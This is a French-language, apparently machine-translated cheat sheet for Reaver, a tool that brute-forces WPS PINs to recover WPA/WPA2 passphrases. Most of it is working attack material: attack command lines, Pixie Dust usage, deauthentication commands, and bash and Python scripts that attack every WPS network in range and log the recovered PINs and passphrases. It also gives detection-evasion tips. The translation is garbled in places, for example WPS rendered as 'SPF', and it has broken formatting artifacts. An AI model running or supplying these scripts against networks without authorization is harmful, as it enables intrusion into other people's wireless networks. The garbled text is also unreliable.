Feuille de réchauffage
Aperçu général
Reaver est un outil de sécurité sans fil spécialisé conçu pour exploiter les vulnérabilités dans les implémentations Wi-Fi Protected Setup (WPS) pour récupérer les mots de passe WPA/WPA2. Développé par Craig Heffner, Reaver implémente une attaque de force brute contre l'authentification WPS PIN, en profitant d'un défaut de conception critique dans le protocole WPS qui permet aux attaquants de récupérer le PIN dans beaucoup moins de tentatives que le maximum théorique. Cette vulnérabilité, connue sous le nom d'attaque WPS PIN, affecte des millions de routeurs sans fil et de points d'accès dans le monde entier.
La faiblesse fondamentale que Reaver exploite réside dans la façon dont WPS valide l'authentification PIN. Au lieu de valider l'ensemble du NIP à 8 chiffres en une seule unité, WPS valide le NIP en deux moitiés distinctes, réduisant ainsi l'espace de recherche de 10^8 combinaisons possibles à environ 11 000 tentatives. Ce défaut de conception, associé au fait que la plupart des implémentations WPS ne mettent pas en œuvre des mécanismes de limitation ou de verrouillage de vitesse appropriés, permet de récupérer les NIP WPS et ensuite la phrase de passe WPA/WPA2 en quelques heures.
Reaver est devenu un outil essentiel pour les évaluations de sécurité sans fil et les tests de pénétration, démontrant les faiblesses de sécurité inhérentes aux implémentations WPS. L'efficacité de l'outil a mené à une sensibilisation générale aux vulnérabilités du SPF et a influencé de nombreuses organisations à désactiver la fonctionnalité du SPF sur leur infrastructure sans fil. Malgré les contre-mesures mises en œuvre par certains fabricants, Reaver demeure utile pour tester les systèmes existants et identifier les réseaux sans fil vulnérables lors des évaluations de sécurité.
Installation
Installation du gestionnaire de paquets
Installer Reaver à travers les gestionnaires de paquets système:
# Ubuntu/Debian installation
sudo apt update
sudo apt install reaver
# Kali Linux (pre-installed)
reaver --help
# CentOS/RHEL installation
sudo yum install epel-release
sudo yum install reaver
# Arch Linux installation
sudo pacman -S reaver
# Verify installation
reaver --version
which reaver
Compilation des sources
Compiler Reaver du code source:
# Install dependencies
sudo apt install build-essential libpcap-dev sqlite3 libsqlite3-dev
# Clone repository
git clone https://github.com/t6x/reaver-wps-fork-t6x.git
cd reaver-wps-fork-t6x
# Navigate to source directory
cd src
# Configure and compile
./configure
make
# Install system-wide
sudo make install
# Verify installation
reaver --version
```_
### Installation Docker
```bash
# Create Dockerfile for Reaver
cat > Dockerfile << 'EOF'
FROM kalilinux/kali-rolling
RUN apt-get update && apt-get install -y reaver aircrack-ng
WORKDIR /workspace
CMD ["/bin/bash"]
EOF
# Build container
docker build -t reaver-toolkit .
# Run with network access
docker run -it --net=host --privileged reaver-toolkit
# Mount workspace
docker run -it --net=host --privileged -v $(pwd):/workspace reaver-toolkit
```_
## Utilisation de base
### Découverte ciblée
Découvrez les points d'accès compatibles avec WPS :
```bash
# Put wireless interface in monitor mode
sudo airmon-ng start wlan0
# Scan for WPS-enabled networks
wash -i wlan0mon
# Detailed WPS scan
wash -i wlan0mon -C
# Scan specific channel
wash -i wlan0mon -c 6
# Save scan results
wash -i wlan0mon -o wps_targets.txt
# Show only networks with WPS enabled
wash -i wlan0mon|grep "Yes"
Système WPS de base Attaque
Effectuer une attaque de base de la force brute WPS PIN:
# Basic Reaver attack
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv
# Attack with specific channel
reaver -i wlan0mon -b 00:11:22:33:44:55 -c 6 -vv
# Attack with delay between attempts
reaver -i wlan0mon -b 00:11:22:33:44:55 -d 1 -vv
# Attack with session file
reaver -i wlan0mon -b 00:11:22:33:44:55 -s session.wpc -vv
# Resume previous session
reaver -i wlan0mon -b 00:11:22:33:44:55 -s session.wpc -vv
Options d'attaque avancées
Configurations avancées d'attaque de Reaver:
# Ignore lock warnings
reaver -i wlan0mon -b 00:11:22:33:44:55 -L -vv
# No NACKS (for some routers)
reaver -i wlan0mon -b 00:11:22:33:44:55 -N -vv
# Disable associated requests
reaver -i wlan0mon -b 00:11:22:33:44:55 -A -vv
# Use small DH keys
reaver -i wlan0mon -b 00:11:22:33:44:55 -S -vv
# Specify timeout
reaver -i wlan0mon -b 00:11:22:33:44:55 -T 1 -vv
Caractéristiques avancées
Gestion du NIP
Gestion des tentatives de rétablissement du NIP du SPF :
# Start from specific PIN
reaver -i wlan0mon -b 00:11:22:33:44:55 -p 12345670 -vv
# Use PIN from file
reaver -i wlan0mon -b 00:11:22:33:44:55 -P pin_list.txt -vv
# Generate PIN list
crunch 8 8 0123456789 > pin_list.txt
# Check specific PIN
reaver -i wlan0mon -b 00:11:22:33:44:55 -p 12345670 -1 -vv
# Show current PIN attempt
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv|grep "Trying pin"
Gestion des séances
Gestion des sessions d'attaque de Reaver :
# Create named session
reaver -i wlan0mon -b 00:11:22:33:44:55 -s target1.wpc -vv
# List existing sessions
ls ~/.reaver/
# View session details
sqlite3 ~/.reaver/target1.wpc "SELECT * FROM status;"
# Delete session
rm ~/.reaver/target1.wpc
# Backup session
cp ~/.reaver/target1.wpc target1_backup.wpc
Limite des taux et calendrier
Contrôler le moment de l'attaque et limiter la vitesse :
# Delay between PIN attempts (seconds)
reaver -i wlan0mon -b 00:11:22:33:44:55 -d 5 -vv
# Delay after 10 failures
reaver -i wlan0mon -b 00:11:22:33:44:55 -r 10:60 -vv
# Maximum number of attempts
reaver -i wlan0mon -b 00:11:22:33:44:55 -g 100 -vv
# Timeout for each attempt
reaver -i wlan0mon -b 00:11:22:33:44:55 -T 5 -vv
# Recurring delay pattern
reaver -i wlan0mon -b 00:11:22:33:44:55 -R 3 -vv
Attaque de poussière de Pixie
Mise en œuvre de l'attaque de poussière de Pixie (hors ligne) :
# Enable Pixie Dust attack
reaver -i wlan0mon -b 00:11:22:33:44:55 -K -vv
# Pixie Dust with specific parameters
reaver -i wlan0mon -b 00:11:22:33:44:55 -K 1 -vv
# Save Pixie Dust data
reaver -i wlan0mon -b 00:11:22:33:44:55 -K -O pixie_data.txt -vv
# Use external Pixie Dust tool
pixiewps -e pke -r pkr -s hash1 -z hash2 -a authkey -n e-nonce
# Automated Pixie Dust with OneShot
python3 oneshot.py -i wlan0mon -b 00:11:22:33:44:55 -K
Scripts d'automatisation
Essai de masse du système WPS
#!/bin/bash
# Mass WPS testing script
INTERFACE="wlan0mon"
RESULTS_DIR="reaver_results"
DELAY=2
mkdir -p $RESULTS_DIR
echo "Starting mass WPS testing"
# Discover WPS targets
echo "Discovering WPS-enabled targets..."
wash -i $INTERFACE -C > $RESULTS_DIR/wps_targets.txt
# Extract target information
grep "Yes" $RESULTS_DIR/wps_targets.txt|while read line; do
BSSID=$(echo $line|awk '\\\\{print $1\\\\}')
CHANNEL=$(echo $line|awk '\\\\{print $2\\\\}')
ESSID=$(echo $line|awk '\\\\{print $6\\\\}')
echo "Testing target: $ESSID ($BSSID) on channel $CHANNEL"
# Create target-specific log
LOG_FILE="$RESULTS_DIR/reaver_$\\\\{BSSID//:/_\\\\}.log"
SESSION_FILE="$RESULTS_DIR/session_$\\\\{BSSID//:/_\\\\}.wpc"
# Try Pixie Dust attack first
echo "Attempting Pixie Dust attack on $BSSID"
timeout 300 reaver -i $INTERFACE -b $BSSID -c $CHANNEL -K -vv -s $SESSION_FILE > $LOG_FILE 2>&1
# Check if Pixie Dust was successful
if grep -q "WPS PIN:" $LOG_FILE; then
echo "SUCCESS: Pixie Dust attack successful for $BSSID"
grep "WPS PIN:\|WPA PSK:" $LOG_FILE >> $RESULTS_DIR/successful_attacks.txt
continue
fi
# If Pixie Dust failed, try regular brute force
echo "Pixie Dust failed, attempting brute force on $BSSID"
timeout 3600 reaver -i $INTERFACE -b $BSSID -c $CHANNEL -d $DELAY -vv -s $SESSION_FILE >> $LOG_FILE 2>&1 &
# Store PID for later management
echo $! > $RESULTS_DIR/reaver_$\\\\{BSSID//:/_\\\\}.pid
sleep 10 # Brief delay between targets
done
echo "Mass WPS testing initiated. Check $RESULTS_DIR for results."
PIN automatisé Récupération
#!/usr/bin/env python3
# Automated WPS PIN recovery script
import subprocess
import re
import time
import json
from datetime import datetime
class ReaverAutomation:
def __init__(self, interface):
self.interface = interface
self.results = \\\\{\\\\}
self.active_attacks = \\\\{\\\\}
def discover_targets(self):
"""Discover WPS-enabled targets"""
cmd = ["wash", "-i", self.interface, "-C"]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
targets = []
for line in result.stdout.split('\n'):
if 'Yes' in line: # WPS enabled
parts = line.split()
if len(parts) >= 6:
target = \\\\{
'bssid': parts[0],
'channel': parts[1],
'rssi': parts[2],
'wps_version': parts[3],
'wps_locked': parts[4],
'essid': ' '.join(parts[5:])
\\\\}
targets.append(target)
return targets
except Exception as e:
print(f"Error discovering targets: \\\\{e\\\\}")
return []
def pixie_dust_attack(self, target):
"""Attempt Pixie Dust attack"""
cmd = [
"reaver",
"-i", self.interface,
"-b", target['bssid'],
"-c", target['channel'],
"-K", # Pixie Dust
"-vv"
]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
# Parse output for PIN and PSK
pin_match = re.search(r'WPS PIN: (\d+)', result.stdout)
psk_match = re.search(r'WPA PSK: (.+)', result.stdout)
if pin_match and psk_match:
return \\\\{
'success': True,
'method': 'pixie_dust',
'pin': pin_match.group(1),
'psk': psk_match.group(1),
'time': datetime.now().isoformat()
\\\\}
else:
return \\\\{'success': False, 'method': 'pixie_dust'\\\\}
except subprocess.TimeoutExpired:
return \\\\{'success': False, 'method': 'pixie_dust', 'error': 'timeout'\\\\}
except Exception as e:
return \\\\{'success': False, 'method': 'pixie_dust', 'error': str(e)\\\\}
def brute_force_attack(self, target, max_time=3600):
"""Attempt brute force attack"""
session_file = f"session_\\\\{target['bssid'].replace(':', '_')\\\\}.wpc"
cmd = [
"reaver",
"-i", self.interface,
"-b", target['bssid'],
"-c", target['channel'],
"-d", "2", # 2 second delay
"-s", session_file,
"-vv"
]
try:
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True)
start_time = time.time()
while True:
if time.time() - start_time > max_time:
process.terminate()
return \\\\{'success': False, 'method': 'brute_force', 'error': 'timeout'\\\\}
line = process.stdout.readline()
if not line:
break
# Check for successful PIN recovery
pin_match = re.search(r'WPS PIN: (\d+)', line)
psk_match = re.search(r'WPA PSK: (.+)', line)
if pin_match and psk_match:
process.terminate()
return \\\\{
'success': True,
'method': 'brute_force',
'pin': pin_match.group(1),
'psk': psk_match.group(1),
'time': datetime.now().isoformat()
\\\\}
# Check for rate limiting
if 'rate limiting' in line.lower():
print(f"Rate limiting detected for \\\\{target['bssid']\\\\}")
time.sleep(60) # Wait before continuing
process.terminate()
return \\\\{'success': False, 'method': 'brute_force'\\\\}
except Exception as e:
return \\\\{'success': False, 'method': 'brute_force', 'error': str(e)\\\\}
def attack_target(self, target):
"""Attack single target with multiple methods"""
print(f"Attacking \\\\{target['essid']\\\\} (\\\\{target['bssid']\\\\})")
# Try Pixie Dust first
result = self.pixie_dust_attack(target)
if result['success']:
print(f"SUCCESS: Pixie Dust attack successful for \\\\{target['bssid']\\\\}")
self.results[target['bssid']] = result
return result
# If Pixie Dust failed, try brute force
print(f"Pixie Dust failed, attempting brute force for \\\\{target['bssid']\\\\}")
result = self.brute_force_attack(target)
if result['success']:
print(f"SUCCESS: Brute force attack successful for \\\\{target['bssid']\\\\}")
else:
print(f"FAILED: All attacks failed for \\\\{target['bssid']\\\\}")
self.results[target['bssid']] = result
return result
def run_mass_attack(self):
"""Run attacks against all discovered targets"""
targets = self.discover_targets()
if not targets:
print("No WPS-enabled targets found")
return
print(f"Found \\\\{len(targets)\\\\} WPS-enabled targets")
for target in targets:
self.attack_target(target)
time.sleep(5) # Brief delay between targets
self.generate_report()
def generate_report(self):
"""Generate attack results report"""
report = \\\\{
'timestamp': datetime.now().isoformat(),
'interface': self.interface,
'total_targets': len(self.results),
'successful_attacks': len([r for r in self.results.values() if r['success']]),
'results': self.results
\\\\}
with open('reaver_report.json', 'w') as f:
json.dump(report, f, indent=2)
print(f"Report saved to reaver_report.json")
print(f"Successful attacks: \\\\{report['successful_attacks']\\\\}/\\\\{report['total_targets']\\\\}")
# Usage
if __name__ == "__main__":
automation = ReaverAutomation("wlan0mon")
automation.run_mass_attack()
Scanner de vulnérabilité WPS
#!/usr/bin/env python3
# WPS vulnerability scanner
import subprocess
import re
import csv
from datetime import datetime
class WPSScanner:
def __init__(self, interface):
self.interface = interface
self.vulnerabilities = []
def scan_wps_networks(self):
"""Scan for WPS-enabled networks"""
cmd = ["wash", "-i", self.interface, "-C"]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
networks = []
for line in result.stdout.split('\n'):
if line.strip() and not line.startswith('BSSID'):
parts = line.split()
if len(parts) >= 5:
network = \\\\{
'bssid': parts[0],
'channel': parts[1],
'rssi': parts[2],
'wps_version': parts[3],
'wps_locked': parts[4],
'wps_enabled': 'Yes' in line,
'essid': ' '.join(parts[5:]) if len(parts) > 5 else 'Hidden'
\\\\}
networks.append(network)
return networks
except Exception as e:
print(f"Error scanning networks: \\\\{e\\\\}")
return []
def test_pixie_dust_vulnerability(self, network):
"""Test if network is vulnerable to Pixie Dust attack"""
cmd = [
"reaver",
"-i", self.interface,
"-b", network['bssid'],
"-c", network['channel'],
"-K", # Pixie Dust
"-vv"
]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
# Check for Pixie Dust vulnerability indicators
if 'WPS PIN:' in result.stdout:
return 'vulnerable'
elif 'Pixie Dust attack failed' in result.stdout:
return 'not_vulnerable'
elif 'timeout' in result.stderr.lower():
return 'timeout'
else:
return 'unknown'
except subprocess.TimeoutExpired:
return 'timeout'
except Exception as e:
return 'error'
def assess_wps_security(self, network):
"""Assess WPS security configuration"""
vulnerabilities = []
# Check if WPS is enabled
if network['wps_enabled']:
vulnerabilities.append('WPS_ENABLED')
# Check if WPS is locked
if network['wps_locked'] == 'No':
vulnerabilities.append('WPS_NOT_LOCKED')
# Check WPS version
if network['wps_version'] in ['1.0', '2.0']:
vulnerabilities.append('VULNERABLE_WPS_VERSION')
# Test Pixie Dust vulnerability
pixie_result = self.test_pixie_dust_vulnerability(network)
if pixie_result == 'vulnerable':
vulnerabilities.append('PIXIE_DUST_VULNERABLE')
return vulnerabilities
def generate_vulnerability_report(self, networks):
"""Generate comprehensive vulnerability report"""
report_data = []
for network in networks:
if network['wps_enabled']:
vulns = self.assess_wps_security(network)
report_entry = \\\\{
'timestamp': datetime.now().isoformat(),
'bssid': network['bssid'],
'essid': network['essid'],
'channel': network['channel'],
'rssi': network['rssi'],
'wps_version': network['wps_version'],
'wps_locked': network['wps_locked'],
'vulnerabilities': ','.join(vulns),
'risk_level': self.calculate_risk_level(vulns)
\\\\}
report_data.append(report_entry)
self.vulnerabilities.extend(vulns)
# Save to CSV
with open('wps_vulnerability_report.csv', 'w', newline='') as csvfile:
fieldnames = ['timestamp', 'bssid', 'essid', 'channel', 'rssi',
'wps_version', 'wps_locked', 'vulnerabilities', 'risk_level']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for entry in report_data:
writer.writerow(entry)
return report_data
def calculate_risk_level(self, vulnerabilities):
"""Calculate risk level based on vulnerabilities"""
if 'PIXIE_DUST_VULNERABLE' in vulnerabilities:
return 'CRITICAL'
elif 'WPS_NOT_LOCKED' in vulnerabilities and 'WPS_ENABLED' in vulnerabilities:
return 'HIGH'
elif 'WPS_ENABLED' in vulnerabilities:
return 'MEDIUM'
else:
return 'LOW'
def run_assessment(self):
"""Run complete WPS security assessment"""
print("Starting WPS vulnerability assessment...")
networks = self.scan_wps_networks()
print(f"Found \\\\{len(networks)\\\\} networks")
wps_networks = [n for n in networks if n['wps_enabled']]
print(f"Found \\\\{len(wps_networks)\\\\} WPS-enabled networks")
if wps_networks:
report = self.generate_vulnerability_report(wps_networks)
# Summary statistics
critical = len([r for r in report if r['risk_level'] == 'CRITICAL'])
high = len([r for r in report if r['risk_level'] == 'HIGH'])
medium = len([r for r in report if r['risk_level'] == 'MEDIUM'])
print(f"\nVulnerability Summary:")
print(f"Critical: \\\\{critical\\\\}")
print(f"High: \\\\{high\\\\}")
print(f"Medium: \\\\{medium\\\\}")
print(f"Report saved to wps_vulnerability_report.csv")
else:
print("No WPS-enabled networks found")
# Usage
if __name__ == "__main__":
scanner = WPSScanner("wlan0mon")
scanner.run_assessment()
Exemples d'intégration
Intégration Aircrack-ng
#!/bin/bash
# Reaver and Aircrack-ng integration
INTERFACE="wlan0mon"
TARGET_BSSID="00:11:22:33:44:55"
TARGET_CHANNEL="6"
echo "Starting integrated WPS/WPA attack"
# Start airodump-ng to capture handshakes
airodump-ng -c $TARGET_CHANNEL -w capture --bssid $TARGET_BSSID $INTERFACE &
AIRODUMP_PID=$!
# Start Reaver attack
reaver -i $INTERFACE -b $TARGET_BSSID -c $TARGET_CHANNEL -vv &
REAVER_PID=$!
# Monitor for successful WPS crack
while kill -0 $REAVER_PID 2>/dev/null; do
if grep -q "WPS PIN:" reaver.log 2>/dev/null; then
echo "WPS PIN recovered!"
kill $REAVER_PID
break
fi
sleep 10
done
# If WPS failed, try WPA handshake capture
if ! grep -q "WPS PIN:" reaver.log 2>/dev/null; then
echo "WPS attack failed, attempting handshake capture"
# Send deauth packets to force handshake
aireplay-ng -0 5 -a $TARGET_BSSID $INTERFACE
# Wait for handshake
sleep 30
# Stop airodump-ng
kill $AIRODUMP_PID
# Check for captured handshake
if aircrack-ng -w wordlist.txt capture-01.cap; then
echo "WPA passphrase recovered via handshake attack"
fi
fi
echo "Attack completed"
Intégration Kismet
#!/usr/bin/env python3
# Reaver and Kismet integration
import subprocess
import json
import time
class ReaverKismetIntegration:
def __init__(self, kismet_server="localhost:2501"):
self.kismet_server = kismet_server
self.wps_targets = []
def get_kismet_devices(self):
"""Get device list from Kismet"""
cmd = [
"curl",
"-s",
f"http://\\\\{self.kismet_server\\\\}/devices/views/all/devices.json"
]
try:
result = subprocess.run(cmd, capture_output=True, text=True)
devices = json.loads(result.stdout)
wps_devices = []
for device in devices:
if 'dot11.device' in device:
dot11 = device['dot11.device']
if 'dot11.device.wps_config_methods' in dot11:
wps_devices.append(\\\\{
'bssid': device['kismet.device.base.macaddr'],
'ssid': dot11.get('dot11.device.last_beaconed_ssid', 'Hidden'),
'channel': dot11.get('dot11.device.channel', 'Unknown'),
'signal': device.get('kismet.device.base.signal', \\\\{\\\\}).get('kismet.common.signal.last_signal', 0)
\\\\})
return wps_devices
except Exception as e:
print(f"Error getting Kismet devices: \\\\{e\\\\}")
return []
def prioritize_targets(self, devices):
"""Prioritize targets based on signal strength and other factors"""
# Sort by signal strength (higher is better)
sorted_devices = sorted(devices, key=lambda x: x['signal'], reverse=True)
# Filter out weak signals
strong_devices = [d for d in sorted_devices if d['signal'] > -70]
return strong_devices
def attack_target(self, target, interface="wlan0mon"):
"""Attack target with Reaver"""
cmd = [
"reaver",
"-i", interface,
"-b", target['bssid'],
"-c", str(target['channel']),
"-K", # Try Pixie Dust first
"-vv"
]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
if 'WPS PIN:' in result.stdout:
return \\\\{
'success': True,
'method': 'pixie_dust',
'output': result.stdout
\\\\}
else:
# Try brute force if Pixie Dust fails
cmd[cmd.index('-K')] = '-d'
cmd.insert(cmd.index('-d') + 1, '2')
result = subprocess.run(cmd, capture_output=True, text=True, timeout=1800)
if 'WPS PIN:' in result.stdout:
return \\\\{
'success': True,
'method': 'brute_force',
'output': result.stdout
\\\\}
else:
return \\\\{'success': False, 'output': result.stdout\\\\}
except subprocess.TimeoutExpired:
return \\\\{'success': False, 'error': 'timeout'\\\\}
except Exception as e:
return \\\\{'success': False, 'error': str(e)\\\\}
def run_integrated_attack(self, interface="wlan0mon"):
"""Run integrated Kismet + Reaver attack"""
print("Getting WPS targets from Kismet...")
devices = self.get_kismet_devices()
if not devices:
print("No WPS devices found in Kismet")
return
print(f"Found \\\\{len(devices)\\\\} WPS-enabled devices")
# Prioritize targets
targets = self.prioritize_targets(devices)
print(f"Attacking \\\\{len(targets)\\\\} prioritized targets")
for target in targets:
print(f"Attacking \\\\{target['ssid']\\\\} (\\\\{target['bssid']\\\\})")
result = self.attack_target(target, interface)
if result['success']:
print(f"SUCCESS: \\\\{target['ssid']\\\\} cracked via \\\\{result['method']\\\\}")
# Log successful attack
with open('successful_attacks.log', 'a') as f:
f.write(f"\\\\{time.ctime()\\\\}: \\\\{target['ssid']\\\\} (\\\\{target['bssid']\\\\}) - \\\\{result['method']\\\\}\n")
else:
print(f"FAILED: \\\\{target['ssid']\\\\} attack unsuccessful")
time.sleep(5) # Brief delay between attacks
# Usage
if __name__ == "__main__":
integration = ReaverKismetIntegration()
integration.run_integrated_attack("wlan0mon")
Dépannage
Questions communes
Problèmes d'interface:
# Check wireless interface
iwconfig
# Put interface in monitor mode
sudo airmon-ng start wlan0
# Check monitor mode interface
iwconfig wlan0mon
# Kill conflicting processes
sudo airmon-ng check kill
# Restart network manager
sudo systemctl restart NetworkManager
Problèmes liés au verrouillage du SPF:
# Check if WPS is locked
wash -i wlan0mon|grep "Yes.*Yes"
# Wait for lock timeout
reaver -i wlan0mon -b 00:11:22:33:44:55 -L -vv
# Use longer delays
reaver -i wlan0mon -b 00:11:22:33:44:55 -d 60 -vv
# Try different attack methods
reaver -i wlan0mon -b 00:11:22:33:44:55 -N -A -vv
** Problèmes d'association :**
# Check signal strength
wash -i wlan0mon|grep BSSID
# Move closer to target
# Increase transmission power (if legal)
sudo iwconfig wlan0mon txpower 20
# Use external antenna
# Check for interference
airodump-ng wlan0mon
Déboguement
Activer le débogage et l'enregistrement détaillés :
# Maximum verbosity
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv
# Log to file
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv 2>&1|tee reaver.log
# Monitor system logs
tail -f /var/log/syslog|grep reaver
# Check wireless driver logs
dmesg|grep -i wireless
# Monitor network traffic
tcpdump -i wlan0mon -w reaver_traffic.pcap
Considérations en matière de sécurité
Considérations juridiques et éthiques
** Essais autorisés seulement:** - Seuls les réseaux de test que vous possédez ou avez la permission explicite de tester - Obtenir une autorisation écrite avant de mener des attaques du WPS - Suivre les lois et règlements locaux concernant les tests de sécurité sans fil - Respecter la confidentialité du trafic réseau - Documenter toutes les activités d'essai de conformité
**Divulgation responsable : ** - Signaler les vulnérabilités aux propriétaires de réseau - Fournir des conseils en matière de remise en état - Accorder un délai raisonnable pour les corrections - Suivre des pratiques de divulgation coordonnées - Maintien de la confidentialité pendant le processus de divulgation
Sécurité opérationnelle
Évitement de détection : - Utiliser des délais appropriés entre les tentatives - Surveiller les réactions défensives - Éviter les heures de pointe - Utiliser des antennes directionnelles si possible - Mettre en œuvre des mesures de sécurité opérationnelles appropriées
Impact sur le réseau: - Réduire au minimum les perturbations pour les utilisateurs légitimes - Éviter les attaques excessives de déauthentification - Surveiller l'impact des performances du réseau - Utiliser des niveaux de puissance appropriés - Respecter les exigences de disponibilité du réseau
Références
- [Récupérer le dépôt GitHub] (LINK_5)
- Protocole WPS
- [Vulnérabilités en matière de sécurité du WPS] (LINK_5)
- Guide des essais de sécurité sans fil
- Normes IEEE 802.11